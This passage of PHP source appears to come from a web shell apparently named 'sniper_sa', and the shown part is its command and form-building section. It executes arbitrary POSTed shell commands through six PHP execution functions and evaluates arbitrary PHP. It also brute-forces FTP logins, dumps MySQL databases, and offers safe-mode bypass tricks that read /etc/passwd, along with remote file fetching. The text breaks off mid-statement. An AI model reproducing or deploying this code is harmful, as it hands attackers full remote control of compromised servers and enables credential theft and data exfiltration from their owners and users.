4549           if (!empty($_POST['command'])) {
4550                 if ($method=="system") {
4551                 system($_POST['command']);
4552                 echo "Functions system";
4553                 }
4554                 if ($method=="passthru") {
4555                 passthru($_POST['command']);
4556                 echo "Functions passthru";
4557                 }
4558                 if ($method=="exec") {
4559                         $string = exec($_POST['command']);
4560                         echo $string;
4561                         echo "Functions exec";
4562                 }
4563                 if ($method=="shell_exec") {
4564                 $string = shell_exec($_POST['command']);
4565                 echo $string;
4566                 echo "Functions shell_exec";
4567                 }
4568                 if ($method=="popen") {
4569                 $pp = popen($_POST['command'], 'r');
4570                 $read = fread($pp, 2096);
4571                 echo $read;
4572                 pclose($pp);
4573                 echo "Functions popen";
4574                   }
4575    if ($method=="proc_open") {
4576 
4577 $command  = isset($_POST['command'])  ? $_POST['command']  : '';
4578 
4579 /* Load the configuration. */
4580 /* Default settings --- these settings should always be set to something. */
4581 /* Merge settings. */
4582 session_start();
4583 
4584     if (!empty($command)) {
4585         /* Save the command for late use in the JavaScript.  If the command is
4586          * already in the history, then the old entry is removed before the
4587          * new entry is put into the list at the front. */
4588         if (($i = array_search($_POST['command'], $_SESSION['history'])) !== false)
4589             unset($_SESSION['history'][$i]);
4590         array_unshift($_SESSION['history'], $_POST['command']);
4591         /* Now append the commmand to the output. */
4592         $_SESSION['output'] .= '$ ' . $_POST['command'] . "\n";
4593         /* Initialize the current working directory. */
4594         if (ereg('^[[:blank:]]*cd[[:blank:]]*$', $_POST['command'])) {
4595             $_SESSION['cwd'] = realpath($ini['settings']['home-directory']);
4596         } elseif (ereg('^[[:blank:]]*cd[[:blank:]]+([^;]+)$', $_POST['command'], $regs)) {
4597             /* The current command is a 'cd' command which we have to handle
4598              * as an internal shell command. */
4599             if ($regs[1]{0} == '/') {
4600                 /* Absolute path, we use it unchanged. */
4601                 $new_dir = $regs[1];
4602             } else {
4603                 /* Relative path, we append it to the current working
4604                  * directory. */
4605                 $new_dir = $_SESSION['cwd'] . '/' . $regs[1];
4606             }
4607             /* Transform '/./' into '/' */
4608             while (strpos($new_dir, '/./') !== false)
4609                 $new_dir = str_replace('/./', '/', $new_dir);
4610             /* Transform '//' into '/' */
4611             while (strpos($new_dir, '//') !== false)
4612                 $new_dir = str_replace('//', '/', $new_dir);
4613             /* Transform 'x/..' into '' */
4614             while (preg_match('|/\.\.(?!\.)|', $new_dir))
4615                 $new_dir = preg_replace('|/?[^/]+/\.\.(?!\.)|', '', $new_dir);
4616             if ($new_dir == '') $new_dir = '/';
4617             /* Try to change directory. */
4618             if (@chdir($new_dir)) {
4619                 $_SESSION['cwd'] = $new_dir;
4620             } else {
4621                 $_SESSION['output'] .= "cd: could not change to: $new_dir\n";
4622             }
4623         } elseif (trim($_POST['command']) == 'exit') {
4624             logout();
4625         } else {
4626             /* The command is not an internal command, so we execute it after
4627              * changing the directory and save the output. */
4628             chdir($_SESSION['cwd']);
4629             // We canot use putenv() in safe mode.
4630             if (!ini_get('safe_mode')) {
4631                 // Advice programs (ls for example) of the terminal size.
4632                 putenv('ROWS=' . $rows);
4633                 putenv('COLUMNS=' . $columns);
4634             }
4635             /* Alias expansion. */
4636             $length = strcspn($_POST['command'], " \t");
4637             $token = substr($_POST['command'], 0, $length);
4638             if (isset($ini['aliases'][$token]))
4639                 $command = $ini['aliases'][$token] . substr($_POST['command'], $length);
4640             $io = array();
4641             $p = proc_open($_POST['command'],
4642                            array(1 => array('pipe', 'w'),
4643                                  2 => array('pipe', 'w')),
4644                            $io);
4645             /* Read output sent to stdout. */
4646             while (!feof($io[1])) {
4647                 $_SESSION['output'] .= htmlspecialchars(fgets($io[1]),
4648                                                         ENT_COMPAT, 'UTF-8');
4649             }
4650             /* Read output sent to stderr. */
4651             while (!feof($io[2])) {
4652                 $_SESSION['output'] .= htmlspecialchars(fgets($io[2]),
4653                                                         ENT_COMPAT, 'UTF-8');
4654             }
4655             fclose($io[1]);
4656             fclose($io[2]);
4657             proc_close($p);
4658         }
4659     }
4660     /* Build the command history for use in the JavaScript */
4661     if (empty($_SESSION['history'])) {
4662         $js_command_hist = '""';
4663     } else {
4664         $escaped = array_map('addslashes', $_SESSION['history']);
4665         $js_command_hist = '"", "' . implode('", "', $escaped) . '"';
4666     }
4667                }
4668                }
4669 
4670   break;
4671    }
4672 }
4673 
4674 
4675 if ($_POST['cmd']=="ftp_brute")
4676  {
4677  $suc = 0;
4678  foreach($users as $user)
4679   {
4680   $connection = @ftp_connect($ftp_server,$ftp_port,10);
4681   if(@ftp_login($connection,$user,$user)) { echo "[+] $user:$user - success\r\n"; $suc++; }
4682   else if(isset($_POST['reverse'])) { if(@ftp_login($connection,$user,strrev($user))) { echo "[+] $user:".strrev($user)." - success\r\n"; $suc++; } }
4683   @ftp_close($connection);
4684   }
4685  echo "\r\n-------------------------------------\r\n";
4686  $count = count($users);
4687  if(isset($_POST['reverse'])) { $count *= 2; }
4688  echo $lang[$language.'_text97'].$count."\r\n";
4689  echo $lang[$language.'_text98'].$suc."\r\n";
4690  }
4691 if ($_POST['cmd']=="php_eval"){
4692  $eval = @str_replace("<?","",$_POST['php_eval']);
4693  $eval = @str_replace("?>","",$eval);
4694  @eval($eval);}
4695 if ($_POST['cmd']=="mysql_dump")
4696  {
4697   if(isset($_POST['dif'])) { $fp = @fopen($_POST['dif_name'], "w"); }
4698   $sql = new my_sql();
4699   $sql->db   = $_POST['db'];
4700   $sql->host = $_POST['db_server'];
4701   $sql->port = $_POST['db_port'];
4702   $sql->user = $_POST['mysql_l'];
4703   $sql->pass = $_POST['mysql_p'];
4704   $sql->base = $_POST['mysql_db'];
4705   if(!$sql->connect()) { echo "[-] ERROR! Can't connect to SQL server"; }
4706   else if(!$sql->select_db()) { echo "[-] ERROR! Can't select database"; }
4707   else if(!$sql->dump($_POST['mysql_tbl'])) { echo "[-] ERROR! Can't create dump"; }
4708   else {
4709    if(empty($_POST['dif'])) { foreach($sql->dump as $v) echo $v."\r\n"; }
4710    else if($fp){ foreach($sql->dump as $v) @fputs($fp,$v."\r\n"); }
4711    else { echo "[-] ERROR! Can't write in dump file"; }
4712    }
4713  }
4714 echo "</textarea></div>";
4715 echo "</b>";
4716 echo "</td></tr></table>";
4717 echo "<table width=100% cellpadding=0 cellspacing=0>";
4718 function div_title($title, $id)
4719 {
4720   return '<a style="cursor: pointer;" onClick="change_divst(\''.$id.'\');">'.$title.'</a>';
4721 }
4722 function div($id)
4723  {
4724  if(isset($_COOKIE[$id]) && $_COOKIE[$id]==0) return '<div id="'.$id.'" style="display: none;">';
4725  return '<div id="'.$id.'">';
4726  }
4727 
4728 if(!$safe_mode){
4729 echo $fs.$table_up1.div_title($lang[$language.'_text2'],'id1').$table_up2.div('id1').$ts;
4730 echo sr(15,"<b>".$lang[$language.'_text3'].$arrow."</b>",in('text','cmd',85,''));
4731 echo sr(15,"<b>".$lang[$language.'_text4'].$arrow."</b>",in('text','dir',85,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt1']));
4732 echo $te.'</div>'.$table_end1.$fe;
4733 }
4734 else{
4735 echo $fs.$table_up1.div_title($lang[$language.'_text28'],'id2').$table_up2.div('id2').$ts;
4736 echo sr(15,"<b>".$lang[$language.'_text4'].$arrow."</b>",in('text','dir',85,$dir).in('hidden','cmd',0,'safe_dir').ws(4).in('submit','submit',0,$lang[$language.'_butt6']));
4737 echo $te.'</div>'.$table_end1.$fe;
4738 }
4739 echo $fs.$table_up1.div_title($lang[$language.'_text208'],'id15').$table_up2.div('id15').$ts;
4740 echo sr(15,"<b>".$lang[$language.'_text16'].$arrow."</b>","<select name=\"method\">
4741                             <option value=\"system\" <? if ($method==\"system\") { echo \"selected\"; } ?>system</option>
4742                             <option value=\"passthru\" <? if ($method==\"passthru\") { echo \"selected\"; } ?>passthru</option>
4743                             <option value=\"exec\" <? if ($method==\"exec\") { echo \"selected\"; } ?>exec</option>
4744                             <option value=\"shell_exec\" <? if ($method==\"shell_exec\") { echo \"selected\"; } ?>shell_exec</option>
4745                             <option value=\"popen\" <? if ($method==\"popen\") { echo \"selected\"; } ?>popen</option>
4746                             <option value=\"proc_open\" <? if ($method==\"proc_open\") { echo \"selected\"; } ?>proc_open</option>
4747                       </select>".in('hidden','dir',0,$dir).ws(2)."<b>".$lang[$language.'_text3'].$arrow."</b>".in('text','command',54,(!empty($_POST['command'])?($_POST['command']):("id"))).in('hidden','cmd',0,'command').ws(4).in('submit','submit',0,$lang[$language.'_butt1']));
4748 echo $te.'</div>'.$table_end1.$fe;
4749 echo $fs.$table_up1.div_title($lang[$language.'_text223'],'id5').$table_up2.div('id5').$ts;
4750 echo sr(15,"<b>".$lang[$language.'_text16'].$arrow."</b>","<select name=\"method\">
4751                             <option value=\"file\" <? if ($method==\"file\") { echo \"selected\"; } ?> file</option>
4752                             <option value=\"fread\" <? if ($method==\"fread\") { echo \"selected\"; } ?> fread</option>
4753                             <option value=\"show_source\" <? if ($method==\"show_source\") { echo \"selected\"; } ?> show_source</option>
4754                             <option value=\"readfile\" <? if ($method==\"readfile\") { echo \"selected\"; } ?> readfile</option>
4755                       </select>".in('hidden','file',0,$dir).ws(2)."<b>".$lang[$language.'_text202'].$arrow."</b>".in('text','file',41,'/etc/passwd').ws(4).in('submit','submit',0,$lang[$language.'_butt1']));
4756 echo $te.'</div>'.$table_end1.$fe;
4757 echo $fs.$table_up1.div_title($lang[$language.'_text42'],'id3').$table_up2.div('id3').$ts;
4758 echo sr(15,"<b>".$lang[$language.'_text43'].$arrow."</b>",in('text','e_name',85,$dir).in('hidden','cmd',0,'edit_file').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt11']));
4759 echo $te.'</div>'.$table_end1.$fe;
4760 echo $fs.$table_up1.div_title($lang[$language.'_text200'],'id3').$table_up2.div('id3').$ts;
4761 echo sr(15,"<b>".$lang[$language.'_text202'].$arrow."</b>",in('text','snn',85,'/etc/passwd').in('hidden','cmd',0,'copy').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt7']));
4762 echo $te.'</div>'.$table_end1.$fe;
4763 echo $fs.$table_up1.div_title($lang[$language.'_text300'],'id3').$table_up2.div('id3').$ts;
4764 echo sr(15,"<b>".$lang[$language.'_text202'].$arrow."</b>",in('text','SnIpEr_SA',85,'/etc/passwd').in('hidden','cmd',0,'cURL').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt7']));
4765 echo $te.'</div>'.$table_end1.$fe;
4766 echo $fs.$table_up1.div_title($lang[$language.'_text203'],'id3').$table_up2.div('id3').$ts;
4767 echo sr(15,"<b>".$lang[$language.'_text202'].$arrow."</b>",in('text','ini_restore',85,'/etc/passwd').in('hidden','cmd',0,'ini_restore').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt7']));
4768 echo $te.'</div>'.$table_end1.$fe;
4769 echo $fs.$table_up1.div_title($lang[$language.'_text224'],'id3').$table_up2.div('id3').$ts;
4770 echo sr(15,"<b>".$lang[$language.'_text202'].$arrow."</b>","<select size=\"1\" name=\"plugin\"><option value=\"plugin\">/etc/passwd</option></option></select>".in('hidden','cmd',0,'plugin').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt7']));
4771 echo $te.'</div>'.$table_end1.$fe;
4772 echo $fs.$table_up1.div_title($lang[$language.'_text35'],'id12').$table_up2.div('id12').$ts;
4773 echo sr(15,"<b>".$lang[$language.'_text36'].$arrow."</b>",in('text','test3_md',15,(!empty($_POST['test3_md'])?($_POST['test3_md']):("mysql"))).ws(4)."<b>".$lang[$language.'_text37'].$arrow."</b>".in('text','test3_ml',15,(!empty($_POST['test3_ml'])?($_POST['test3_ml']):("root"))).ws(4)."<b>".$lang[$language.'_text38'].$arrow."</b>".in('text','test3_mp',15,(!empty($_POST['test3_mp'])?($_POST['test3_mp']):("password"))).ws(4)."<b>".$lang[$language.'_text14'].$arrow."</b>");
4774 echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test3_file',96,(!empty($_POST['test3_file'])?($_POST['test3_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'mysqlb').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
4775 echo $te.'</div>'.$table_end1.$fe;
4776 echo $fs.$table_up1.div_title($lang[$language.'_text220'],'id3').$table_up2.div('id3').$ts;
4777 echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','sym1p2',50,(!empty($_POST['sym1p2'])?($_POST['sym1p']):("/../../../"))).in('text','sym1p',50,(!empty($_POST['sym1p'])?($_POST['sym1p']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'sym1').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
4778 echo $te.'</div>'.$table_end1.$fe;
4779 echo $fs.$table_up1.div_title($lang[$language.'_text222'],'id3').$table_up2.div('id3').$ts;
4780 echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('hidden','dir',0,$dir).in('hidden','cmd',0,'sym2').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
4781 echo $te.'</div>'.$table_end1.$fe;
4782 {
4783 echo $fs.$table_up1.div_title($lang[$language.'_text204'],'id23').$table_up2.div('id23').$ts;
4784 echo sr(15,"<b>".$lang[$language.'_text205'].$arrow."</b>",in('text','log',96,(!empty($_POST['log'])?($_POST['log']):($dir))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'?? ??? ???? ???????? ???????? filename.php?ss=http://shell.txt?').ws(4).in('submit','submit',0,$lang[$language.'_butt65']));
4785 echo $te.'</div>'.$table_end1.$fe;
4786 echo $fs.$table_up1.div_title($lang[$language.'_text207'],'id3').$table_up2.div('id3').$ts;
4787 echo sr(15,"<b>".$lang[$language.'_text206'].$arrow."</b>",in('text','glob',85,'/etc/').in('hidden','cmd',0,'glob').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt7']));
4788 echo $te.'</div>'.$table_end1.$fe;
4789 echo $fs.$table_up1.div_title($lang[$language.'_text209'],'id3').$table_up2.div('id3').$ts;
4790 echo sr(15,"<b>".$lang[$language.'_text206'].$arrow."</b>",in('text','root',85,'/etc/').in('hidden','cmd',0,'root').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt7']));
4791 echo $te.'</div>'.$table_end1.$fe;
4792 echo $fs.$table_up1.div_title($lang[$language.'_text210'],'id11').$table_up2.div('id11').$ts;
4793 echo "<table class=table1 width=100% align=center>";
4794 echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','zend',85,(!empty($_POST['zend'])?($_POST['zend']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'zend').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
4795 echo $te.'</div>'.$table_end1.$fe;
4796 echo $table_up1.div_title($lang[$language.'_text211'],'id21').$table_up2.div('id21').$ts."<tr>".$fs."<td valign=top width=34%>".$ts;
4797 echo "<font face=tahoma size=-2><b><div align=center id='n'>".$lang[$language.'_text212']."</div></b></font>";
4798 echo sr(40,"<b>".$lang[$language.'_text20'].$arrow."</b>",in('text','php_ini1',10,'php.ini').ws(4).in('submit','submit',0,$lang[$language.'_butt65']));
4799 echo "<font face=tahoma size=-2><b><div align=center id='n'>".$lang[$language.'_text213']."</div></b></font>";
4800 echo sr(40,"<b>".$lang[$language.'_text20'].$arrow."</b>",in('text','htacces',10,'htaccess').ws(4).in('submit','submit',0,$lang[$language.'_butt65']));
4801 echo "<font face=tahoma size=-2><b><div align=center id='n'>".$lang[$language.'_text218']."</div></b></font>";
4802 echo sr(40,"<b>".$lang[$language.'_text20'].$arrow."</b>",in('text','file_ini',10,'ini.php').ws(4).in('submit','submit',0,$lang[$language.'_butt65']));
4803 echo $te.'</div>'.$table_end1.$fe;
4804 echo $fs.$table_up1.div_title($lang[$language.'_text221'],'id15').$table_up2.div('id15').$ts;
4805 echo sr(15,"<b>".$lang[$language.'_text16'].$arrow."</b>",in('hidden','dir',0,$dir).ws(2)."<b>".$lang[$language.'_text17'].$arrow."</b>".in('text','funzip',78,"$dir/file"));
4806 echo sr(15,"<b>".$lang[$language.'_text65'].$arrow."</b>",in('text','fzip',105,"$dir/sploitz.zip").ws(4).in('submit','submit',0,$lang[$language.'_butt2']));
4807 echo $te.'</div>'.$table_end1.$fe;
4808 echo $fs.$table_up1.div_title($lang[$language.'_text219'],'id15').$table_up2.div('id15').$ts;
4809 echo sr(15,"<b>".$lang[$language.'_text16'].$arrow."</b>",in('hidden','dir',0,$dir).ws(2)."<b>".$lang[$language.'_text17'].$arrow."</b>".in('text','filefrom',78,'http://website.com/file.txt'));
4810 echo sr(15,"<b>".$lang[$language.'_text21'].$arrow."</b>",in('text','fileto',105,filename_.php).ws(4).in('submit','submit',0,$lang[$language.'_butt2']));
4811 echo $te.'</div>'.$table_end1.$fe;
4812 $aliases2 = '';
4813 foreach ($aliases as $alias_name=>$alias_cmd)
4814  {
4815  $aliases2 .= "<option>$alias_name</option>";
4816  }
4817 echo $fs.$table_up1.div_title($lang[$language.'_text7'],'id6').$table_up2.div('id6').$ts;
4818 echo sr(15,"<b>".ws(9).$lang[$language.'_text8'].$arrow.ws(4)."</b>","<select name=alias>".$aliases2."</select>".in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt1']));
4819 echo $te.'</div>'.$table_end1.$fe;
4820 }
4821 if($safe_mode){
4822 echo $fs.$table_up1.div_title($lang[$language.'_text57'],'id4').$table_up2.div('id4').$ts;
4823 echo sr(15,"<b>".$lang[$language.'_text58'].$arrow."</b>",in('text','mk_name',54,(!empty($_POST['mk_name'])?($_POST['mk_name']):("new_name"))).ws(4)."<select name=action><option value=create>".$lang[$language.'_text65']."</option><option value=delete>".$lang[$language.'_text66']."</option></select>".ws(3)."<select name=what><option value=file>".$lang[$language.'_text59']."</option><option value=dir>".$lang[$language.'_text60']."</option></select>".in('hidden','cmd',0,'mk').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt13']));
4824 echo $te.'</div>'.$table_end1.$fe;
4825 }
4826 if($safe_mode && $unix){
4827 echo $fs.$table_up1.div_title($lang[$language.'_text67'],'id5').$table_up2.div('id5').$ts;
4828 echo sr(15,"<b>".$lang[$language.'_text68'].$arrow."</b>","<select name=what><option value=mod>CHMOD</option><option value=own>CHOWN</option><option value=grp>CHGRP</option></select>".ws(2)."<b>".$lang[$language.'_text69'].$arrow."</b>".ws(2).in('text','param1',40,(($_POST['param1'])?($_POST['param1']):("filename"))).ws(2)."<b>".$lang[$language.'_text70'].$arrow."</b>".ws(2).in('text','param2 title="'.$lang[$language.'_text71'].'"',26,(($_POST['param2'])?($_POST['param2']):("0777"))).in('hidden','cmd',0,'ch_').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt1']));
4829 echo $te.'</div>'.$table_end1.$fe;
4830 }
4831 if($safe_mode){
4832 echo $fs.$table_up1.div_title($lang[$language.'_text54'],'id7').$table_up2.div('id7').$ts;
4833 echo sr(15,"<b>".$lang[$language.'_text52'].$arrow."</b>",in('text','s_text',85,'text').ws(4).in('submit','submit',0,$lang[$language.'_butt12']));
4834 echo sr(15,"<b>".$lang[$language.'_text53'].$arrow."</b>",in('text','s_dir',85,$dir)." * ( /root;/home;/tmp )");
4835 echo sr(15,"<b>".$lang[$language.'_text55'].$arrow."</b>",in('checkbox','m id=m',0,'1').in('text','s_mask',82,'.txt;.php')."* ( .txt;.php;.htm )".in('hidden','cmd',0,'search_text').in('hidden','dir',0,$dir));
4836 echo $te.'</div>'.$table_end1.$fe;
4837 if(!$safe_mode && $unix){
4838 echo $fs.$table_up1.div_title($lang[$language.'_text76'],'id8').$table_up2.div('id8').$ts;
4839 echo sr(15,"<b>".$lang[$language.'_text72'].$arrow."</b>",in('text','s_text',85,'text').ws(4).in('submit','submit',0,$lang[$language.'_butt12']));
4840 echo sr(15,"<b>".$lang[$language.'_text73'].$arrow."</b>",in('text','s_dir',85,$dir)." * ( /root;/home;/tmp )");
4841 echo sr(15,"<b>".$lang[$language.'_text74'].$arrow."</b>",in('text','s_mask',85,'*.[hc]').ws(1).$lang[$language.'_text75'].in('hidden','cmd',0,'find_text').in('hidden','dir',0,$dir));
4842 echo $te.'</div>'.$table_end1.$fe;
4843 }
4844 echo $fs.$table_up1.div_title($lang[$language.'_text32'],'id9').$table_up2.$font;
4845 echo "<div align=center>".div('id9')."<textarea name=php_eval cols=100 rows=3>";
4846 echo (!empty($_POST['php_eval'])?($_POST['php_eval']):("/* delete script */\r\n//unlink(\"sniper_sa.php\");\r\n//readfile(\"/etc/passwd\");"));
4847 echo "</textarea>";
4848 echo in('hidden','dir',0,$dir).in('hidden','cmd',0,'php_eval');
4849 echo "<br>".ws(1).in('submit','submit',0,$lang[$language.'_butt1']);
4850 echo "</div></div></font>";
4851 echo $table_end1.$fe;
4852 if($safe_mode&&$curl_on)
4853 {
4854 echo $fs.$table_up1.div_title($lang[$language.'_text33'],'id10').$table_up2.div('id10').$ts;
4855 echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test1_file',85,(!empty($_POST['test1_file'])?($_POST['test1_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test1').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
4856 echo $te.'</div>'.$table_end1.$fe;
4857 }
4858 }
4859 if($safe_mode)
4860 {
4861 echo $fs.$table_up1.div_title($lang[$language.'_text34'],'id11').$table_up2.div('id11').$ts;
4862 echo "<table class=table1 width=100% align=center>";
4863 echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test2_file',85,(!empty($_POST['test2_file'])?($_POST['test2_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test2').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
4864 echo $te.'</div>'.$table_end1.$fe;
4865 }
4866 
4867 if($safe_mode&&$mssql_on)
4868 {
4869 echo $fs.$table_up1.div_title($lang[$language.'_text85'],'id13').$table_up2.div('id13').$ts;
4870 echo sr(15,"<b>".$lang[$language.'_text36'].$arrow."</b>",in('text','test4_md',15,(!empty($_POST['test4_md'])